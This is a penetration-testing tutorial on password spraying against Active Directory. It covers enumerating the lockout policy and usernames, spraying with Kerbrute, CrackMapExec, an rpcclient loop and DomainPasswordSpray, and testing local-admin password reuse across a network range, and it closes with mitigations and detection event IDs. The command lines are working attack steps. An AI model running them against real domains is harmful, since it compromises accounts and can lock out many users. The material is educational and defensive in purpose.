Password Spraying - AD
This section will cover Password Spraying attacks in Active Directory.
Table of Contents
- Overview
- Enumeration
- CrackMapExec
- Kerbrute
- net and PowerView
- SMB NULL Sessions
- rpcclient
- enum4linux-ng
- LDAP Anonymous Bind
- ldapsearch
- windapsearch
- Exploitation
- Kerbrute
- CrackMapExec
- rpcclient
- DomainPasswordSpray
- Mitigations
Overview
Password spraying is an attack in which the attacker tries one password (or a small set of passwords) against many usernames, rather than many passwords against one account.
In Active Directory the attack is bounded by the domain lockout policy: too many failed attempts against an account inside the lockout observation window lock that account, so a careless spray can lock out large numbers of users and cause a denial of service (DoS). A successful attempt yields a valid domain credential, which compromises that account and exposes the domain to further attack.
Enumeration
Before spraying we need two things: the domain password policy (above all the lockout threshold and observation window, which bound how many guesses we can make per account) and a list of valid usernames. Both can be gathered with tools such as CrackMapExec or Kerbrute, or without credentials via SMB NULL sessions and LDAP anonymous binds as shown below.
CrackMapExec
To use CrackMapExec, we can use the following command. We will require valid domain credentials to perform this.
crackmapexec smb <Target IP> -u <username> -p <password> --pass-pol
Command breakdown:
- smb - Use the SMB protocol.
- <Target IP> - The target IP address.
- -u <username> - The username to authenticate with.
- -p <password> - The password to authenticate with.
- --pass-pol - Enumerate the password policy.
To enumerate usernames, we can use one of the following commands. The unauthenticated form only works when the domain controller permits SMB NULL sessions; otherwise supply valid domain credentials.
crackmapexec smb <Target IP> --users
crackmapexec smb <Target IP> -u <username> -p "<password>" --users
Command breakdown:
- smb - Use the SMB protocol.
- <Target IP> - The target IP address.
- -u <username> - The username to authenticate with.
- -p "<password>" - The password to authenticate with (quoted so shell metacharacters survive).
- --users - Enumerate domain users.
Kerbrute
We can use Kerbrute to enumerate valid AD accounts using the following command.
kerbrute userenum -d <domain> --dc <Domain Controller IP> /path/to/users/wordlist
Command breakdown:
- userenum - Perform user enumeration.
- -d <domain> - The target domain.
- --dc <Domain Controller IP> - The domain controller IP address.
- /path/to/users/wordlist - The wordlist of candidate usernames to test.
net and PowerView
On Windows, we can use tools such as the built-in net command or PowerView to enumerate for the password policy. We will require valid domain credentials to perform this.
net accounts
We can also use PowerView to enumerate the password policy. The SystemAccess section of the returned policy holds the lockout settings (LockoutBadCount, LockoutDuration and ResetLockoutCount).
Import-Module .\PowerView.ps1
Get-DomainPolicy
SMB NULL Sessions
We can also obtain the password policy from Linux and Windows via SMB NULL sessions.
SMB NULL sessions allow an unauthenticated attacker to retrieve information from the domain, such as users, groups, computers, password policies, etc. This is often the result of legacy Domain Controllers being upgraded in place which brings along any security misconfigurations from the older version of Windows Server.
The following will be covered:
- rpcclient
- enum4linux-ng
rpcclient
To use rpcclient, we can use the following command.
rpcclient -U "" -N <Target IP>
Once connected, querydominfo prints general information about the domain, getdompwinfo returns the minimum password length and password properties, and enumdomusers lists the domain users together with their RIDs.
enum4linux-ng
enum4linux-ng is written in Python and allows us to output the results into formats such as YAML or JSON which can be processed using other tools.
We can use the following command enumerate the password policy.
enum4linux-ng -P <Target IP> -oA <file name>
Command breakdown:
- -P - Extract the password policy.
- <Target IP> - The target IP address.
- -oA <file name> - Write the results to <file name> in every supported format (YAML, JSON and plain text).
We can also use the original enum4linux to enumerate users; its user:[name] rid:[...] output lines are cut down to bare usernames.
enum4linux -U <Target IP> | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
Command breakdown:
- -U - Enumerate users.
- <Target IP> - The target IP address.
- | grep "user:" - Pipe the output to grep and keep only lines containing user:.
- | cut -f2 -d"[" - Pipe the output to cut, split on [ and take the second field (everything after the first [).
- | cut -f1 -d"]" - Pipe the output to cut, split on ] and take the first field, leaving the bare username.
LDAP Anonymous Bind
LDAP anonymous binds allow an unauthenticated attacker to retrieve information from the domain such as listings of users, groups, computers, password policies, and more. This is a legacy configuration: as of Windows Server 2003, by default only authenticated users are permitted to initiate LDAP requests, so an anonymous bind that returns domain data indicates a deliberate or inherited misconfiguration.
ldapsearch
With an LDAP anonymous bind, we can use LDAP-specific enumeration tools to pull the password policy.
To enumerate the password policy, we can use the following command.
ldapsearch -h <Target IP> -x -b "DC=<Domain name>,DC=<TLD>" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
Command breakdown:
- -h <Target IP> - The LDAP server to connect to. Newer OpenLDAP clients deprecate -h; use -H ldap://<Target IP> instead.
- -x - Use simple authentication instead of SASL.
- -b "DC=<Domain name>,DC=<TLD>" - The search base, built from the second level and top level domain (e.g. DC=mycorp,DC=lan).
- -s sub - Search scope is sub: search the base DN and all its descendants.
- "*" - Retrieve all attributes for entries that match the filter.
- | grep - Pipe the output into grep.
- -m 1 - Stop after the first match.
- -B 10 - Include the 10 lines before the match in the output.
- pwdHistoryLength - The string to search for; the surrounding lines carry the other policy attributes (minPwdLength, lockoutThreshold, lockOutObservationWindow, lockoutDuration).
To enumerate for users, we can use the following command.
ldapsearch -h <Target IP> -x -b "DC=<second level domain>,DC=<top level domain>" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
Command breakdown:
- -h <Target IP> - The target IP address.
- -x - Use simple authentication instead of SASL.
- -b "DC=<second level domain>,DC=<top level domain>" - The search base, built from the second level and top level domain.
- -s sub - Search scope is sub: search the base DN and all its descendants.
- "(&(objectclass=user))" - Filter for objects of class user within the domain.
- | grep sAMAccountName: - Pipe the output to grep and keep only lines containing sAMAccountName:.
- | cut -f2 -d" " - Pipe the output to cut, split on spaces and take the second field (the bare username).
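The grep above shows the raw attributes, but AD stores every duration in the policy (lockoutDuration, lockOutObservationWindow, maxPwdAge, minPwdAge) as a negative count of 100-nanosecond ticks, so the values need converting before they can drive a spray plan. The script below is an added example, not code from the page or from ldapsearch; it decodes those attributes from a constructed sample of ldapsearch output (the attribute names are the real AD ones, the values are made up), and the final comment shows the assumed live invocation.

```shell
#!/usr/bin/env bash
# Decode the AD password and lockout policy from ldapsearch output.
# Added example: not taken from the page or from any tool it covers.

# Constructed sample of the domain root object as ldapsearch prints it.
# Attribute names are real AD attributes; the values are made up for the example.
SAMPLE_LDAP='dn: DC=mycorp,DC=lan
objectClass: domainDNS
minPwdLength: 7
pwdHistoryLength: 24
lockoutThreshold: 5
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
maxPwdAge: -36288000000000
minPwdAge: -864000000000'

# ad_interval_to_minutes TICKS
# AD intervals are negative 100-nanosecond ticks: 1 minute = 60 * 10^7 = 600000000.
# INT64_MIN is the "never" sentinel (locked until an admin unlocks / passwords never expire).
ad_interval_to_minutes() {
    case "$1" in
        -9223372036854775808) echo never ;;
        *)                    echo $(( -($1) / 600000000 )) ;;
    esac
}

# ldap_password_policy: reads ldapsearch output on stdin and prints one key=value
# line per policy attribute, with durations converted to minutes (m) or days (d).
# ldapsearch folds lines longer than 76 characters, which never happens for these attributes.
ldap_password_policy() {
    local line key val m
    while IFS= read -r line || [ -n "$line" ]; do
        key=${line%%:*}
        val=${line#*: }
        case "$key" in
            lockoutThreshold|minPwdLength|pwdHistoryLength)
                echo "$key=$val" ;;
            lockoutDuration|lockOutObservationWindow)
                m=$(ad_interval_to_minutes "$val")
                [ "$m" = never ] && echo "$key=never" || echo "$key=${m}m" ;;
            maxPwdAge|minPwdAge)
                m=$(ad_interval_to_minutes "$val")
                [ "$m" = never ] && echo "$key=never" || echo "$key=$(( m / 1440 ))d" ;;
        esac
    done
}

# Against a live DC (assumption: anonymous bind allowed; -s base returns the domain root only):
#   ldapsearch -x -H ldap://<Target IP> -b "DC=mycorp,DC=lan" -s base | ldap_password_policy
printf '%s\n' "$SAMPLE_LDAP" | ldap_password_policy
```

For the constructed sample this prints lockoutThreshold=5, lockoutDuration=30m and lockOutObservationWindow=30m, which is exactly the pair of numbers the spray has to respect: at most four failures per account, then a 30 minute pause before the counter resets.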
windapsearch
We can use a tool called windapsearch to enumerate for usernames.
python3 windapsearch.py --dc-ip <Domain Controller IP> -u "" -U
Command breakdown:
- --dc-ip <Domain Controller IP> - The domain controller IP address.
- -u "" - The username to bind as; an empty string requests an anonymous bind.
- -U - Enumerate users.
Exploitation
There are several tools that can be used to perform password spraying.
The following will be covered:
- Kerbrute
- CrackMapExec
- rpcclient
- DomainPasswordSpray
Kerbrute
We can use the following command to spray a single password against a list of users. Kerbrute authenticates through Kerberos pre-authentication rather than SMB or LDAP logons, but failed pre-authentication still increments the account's bad password count, so the lockout policy applies exactly as it does for the other tools.
kerbrute passwordspray -d <domain> --dc <Domain Controller IP> <username wordlist> <password>
Command breakdown:
- passwordspray - Perform password spraying.
- -d <domain> - The target domain.
- --dc <Domain Controller IP> - The domain controller IP address.
- <username wordlist> - The list of usernames to spray.
- <password> - The single password to try against every user.
An example:
kerbrute passwordspray -d mycorp.lan --dc 10.42.0.22 valid_users.txt MyPassword1
CrackMapExec
We can use the following command to perform password spraying and filter out the logon failures. Note that CrackMapExec stops after the first successful login by default; add --continue-on-success to keep spraying the remainder of the list.
crackmapexec smb <Target IP> -u <username wordlist> -p <password> | grep +
Command breakdown:
- smb - Use the SMB protocol.
- <Target IP> - The target IP address.
- -u <username wordlist> - The list of valid usernames to spray.
- -p <password> - The single password to try.
- | grep + - Pipe the output to grep and only show lines containing +, i.e. successful logins.
Once we have obtained valid credentials, we can verify them using the following command.
crackmapexec smb <Target IP> -u <username> -p <password>
If the credentials we obtain belong to a local administrator account, we can check whether the password is reused on other machines in the network.
crackmapexec smb <Network IP>/<CIDR> -u administrator -p <password> --local-auth | grep +
Command breakdown:
- smb - Use the SMB protocol.
- <Network IP>/<CIDR> - The network range to test, in CIDR notation.
- -u administrator - The username to authenticate with (administrator in this example).
- -p <password> - The password to authenticate with.
- --local-auth - Authenticate as a local account rather than a domain account.
- | grep + - Pipe the output to grep and only show lines containing +, i.e. successful logins.
rpcclient
We can also use the following bash one-liner to perform password spraying.
for u in $(cat <username wordlist>);do rpcclient -U "$u%<password>" -c "getusername;quit" <Target IP> | grep Authority; done
The loop reads each username from <username wordlist>, attempts a login with <password>, runs getusername, and pipes the output to grep for Authority. Only a successful login prints an Authority Name line, so each line of output is a valid credential.
DomainPasswordSpray
If we are attacking from a Windows machine, we can use a PowerShell script called DomainPasswordSpray.ps1. It can be downloaded from GitHub.
https://github.com/dafthack/DomainPasswordSpray
Once downloaded, we can use the following command to import our module.
Import-Module .\DomainPasswordSpray.ps1
We can use the following command to perform password spraying. Without a -UserList, the script enumerates the domain users itself and reads the domain lockout policy before spraying, warning if the spray would exceed it.
Invoke-DomainPasswordSpray -Password <password> -OutFile <file name> -ErrorAction SilentlyContinue
Command breakdown:
- -Password <password> - The single password to spray.
- -OutFile <file name> - The output file to save successful credentials to.
- -ErrorAction SilentlyContinue - Continue past non-terminating errors instead of printing them.
Mitigations
To mitigate password spraying, enforce multi-factor authentication so that a guessed password alone does not grant access.
Enforce the principle of least privilege so that a compromised account can do as little as possible within the system and domain.
Maintain a strong password policy and good password hygiene: restrict dictionary words, common passwords, and variations of predictable phrases such as the company name. A sensible lockout threshold and observation window cap the number of guesses per account, but lockout is also what makes the DoS described above possible, so pair it with monitoring rather than relying on it alone.
A spray is also easy to detect: it shows up as failed logons (event 4625 for NTLM/SMB logons, 4771 for Kerberos pre-authentication failures) spread across many accounts from a single source in a short period.